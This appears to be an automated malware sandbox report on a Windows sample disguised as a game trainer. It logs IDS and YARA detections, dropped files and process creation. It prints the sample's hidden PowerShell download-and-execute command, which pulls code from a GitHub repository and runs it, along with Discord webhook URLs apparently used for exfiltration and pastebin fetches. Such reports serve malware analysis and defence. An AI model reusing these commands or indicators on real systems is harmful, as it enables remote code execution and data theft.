Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49769 -> 185.199.110.133:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49774 -> 185.199.110.133:443
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm3.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/Backend.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.com
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/FH5.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.com
Source: global trafficHTTP traffic detected: POST /api/webhooks/1284710807871033355/x0K3Voa94DlgTs4VQWHyks9bUB8i5Uipo6HRW6lKUeKFJpTODgkBqgFx7seLHmsLq996 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 214Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 299Connection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 299Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm3.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm3.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/Backend.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.com
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/FH5.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.com
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm3.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
Source: global trafficDNS traffic detected: DNS query: discord.com
Source: global trafficDNS traffic detected: DNS query: pastebin.com
Source: unknownHTTP traffic detected: POST /api/webhooks/1284710807871033355/x0K3Voa94DlgTs4VQWHyks9bUB8i5Uipo6HRW6lKUeKFJpTODgkBqgFx7seLHmsLq996 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 214Connection: Keep-Alive
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Oct 2024 14:00:23 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1729000824x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yZwHVV3oyM08cJv8SLb5u5nA1EtS3vbqCCwyFfcgFUn2fz1GDF60NiE7DhBB%2BMjh2NBXMnQXHguIiht1a7WCvdTIX59D%2FUNewqEHY9Ctb%2Bjqussj2z9OmtQyYb%2B4"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=2c6b90bcc111f27f2ee13f9d01d696a78cc3cbd8-1729000823; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=kdwA._iH252scPNEf4uY2uYh8cCZejVEgGbwGQZlEuQ-1729000823460-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d3055c9ed552c98-DFW
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Oct 2024 14:00:40 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1729000841x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V5apL0iNoHSriEsYfXs6DkvhAJ6VrV7f%2FFS3lB7uozRivpAB5EybX%2Bzffc49OcE37h6HX3KPu84iVNqf2on7sd3gO98II29SxT8gKjC7HM%2FitB4568wkjtIXWsEj"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=2ea9685ce586c51b0bca2e633e8796cf617bbecc-1729000840; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=pfSABZuGpKd97j4bwvkwvMGT1XMDmt46TNQbVDaLbnI-1729000840266-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d30563308774793-DFW
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Oct 2024 14:00:47 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1729000848x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yS%2F3xDx9elF6UPdyjvAxMpz8NOukibj3jNZnbq09xDjG%2FHavC6Pl6RpdvOniPUHPxYFWpFah9vTMLy4MUNszcFDGFp%2B%2FUmatePlZJMMcq8vZw8B4Du9ehCZCqoi7"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=c453b1697f233c556eb34ab0a1e46ced33d81e9a-1729000847; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=AxGKe2q8ncRCpRbVwbVwvBf2CntulAILogF5xavJrSY-1729000847285-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d30565ebc463ab9-DFW
Source: svchost.exe, 00000007.00000002.3431175834.000001F169ACD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: powershell.exe, 0000000D.00000002.2693402019.000002059FC1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2764790986.000001276301F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://discord.com
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.7.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 0000000D.00000002.2693402019.000002059F1D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2693402019.000002059EC7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2693402019.000002059F1EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2764790986.00000127625CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2764790986.00000127625E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2764790986.0000012762078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
Source: powershell.exe, 00000012.00000002.2764790986.0000012762078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com/raw/sA04Mwk2
Source: powershell.exe, 0000000D.00000002.2693402019.000002059F26B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2693402019.000002059F29A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2764790986.0000012762694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2764790986.0000012762665000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com
Source: powershell.exe, 00000012.00000002.2764790986.0000012762665000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Source: powershell.exe, 0000000D.00000002.2693402019.000002059E771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2764790986.0000012761BB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000D.00000002.2693402019.000002059E7D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2693402019.000002059E794000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2764790986.0000012761BB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2764790986.0000012761BCE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000D.00000002.2693402019.000002059FC1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2764790986.000001276301F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com
Source: powershell.exe, 0000000D.00000002.2693402019.000002059FC1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2764790986.000001276301F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/128545359042878
Source: powershell.exe, 0000000D.00000002.2693402019.000002059F2FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2764790986.0000012762742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQ
Source: powershell.exe, 00000012.00000002.2764790986.0000012762742000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2764790986.0000012762702000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2764790986.0000012762734000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_
Source: powershell.exe, 00000012.00000002.2764790986.000001276301F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.comP.
Source: edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000007.00000003.2331876949.000001F16F200000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: powershell.exe, 0000000D.00000002.2693402019.000002059EC7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2764790986.0000012762078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: qmgr.db.7.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:
Source: powershell.exe, 0000000D.00000002.2693402019.000002059F1DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2764790986.00000127625D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
Source: powershell.exe, 0000000D.00000002.2693402019.000002059F1D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2693402019.000002059F1DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2764790986.00000127625CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2764790986.00000127625D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/sA04Mwk2
Source: powershell.exe, 0000000D.00000002.2693402019.000002059F29A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2764790986.0000012762694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
Source: powershell.exe, 0000000D.00000002.2693402019.000002059F1EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2693402019.000002059F213000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2764790986.00000127625E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2764790986.000001276260E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.5:49741 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.5:49860 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:49870 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.5:49881 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:49910 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.5:49921 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.5:49952 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.5:49990 version: TLS 1.2

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: amsi64_3136.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi64_7296.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3136, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7296, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Backend.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeJump to dropped file
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: C:\Users\user\Desktop\xK44OOt7vD.exeCode function: 0_2_00007FF7EA0211C00_2_00007FF7EA0211C0
Source: C:\Users\user\Desktop\xK44OOt7vD.exeCode function: 0_2_00007FF7EA02F3780_2_00007FF7EA02F378
Source: C:\Users\user\Desktop\xK44OOt7vD.exeCode function: 0_2_00007FF7EA028C540_2_00007FF7EA028C54
Source: C:\Users\user\Desktop\xK44OOt7vD.exeCode function: 0_2_00007FF7EA0276280_2_00007FF7EA027628
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeCode function: 6_2_00007FF8B8F727206_2_00007FF8B8F72720
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeCode function: 6_2_00007FF848A51A486_2_00007FF848A51A48
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF848A5B99613_2_00007FF848A5B996
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF848A5C75B13_2_00007FF848A5C75B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF848A5D1B113_2_00007FF848A5D1B1
Source: Stand_Trainer_Updated.exe.2.drStatic PE information: No import functions for PE file found
Source: amsi64_3136.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi64_7296.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 3136, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7296, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@25/25@3/4
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeCode function: 6_2_00007FF8B8F72010 CreateToolhelp32Snapshot,Process32First,strcmp,Process32Next,6_2_00007FF8B8F72010
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7436:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nsc3nxof.kov.ps1Jump to behavior
Source: xK44OOt7vD.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\xK44OOt7vD.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: xK44OOt7vD.exeReversingLabs: Detection: 39%
Source: unknownProcess created: C:\Users\user\Desktop\xK44OOt7vD.exe "C:\Users\user\Desktop\xK44OOt7vD.exe"
Source: C:\Users\user\Desktop\xK44OOt7vD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm3.txt -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rlfwipso\rlfwipso.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8530.tmp" "c:\Users\user\AppData\Local\Temp\rlfwipso\CSC770B74A1B374466B59916F033873949.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe "C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe"
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
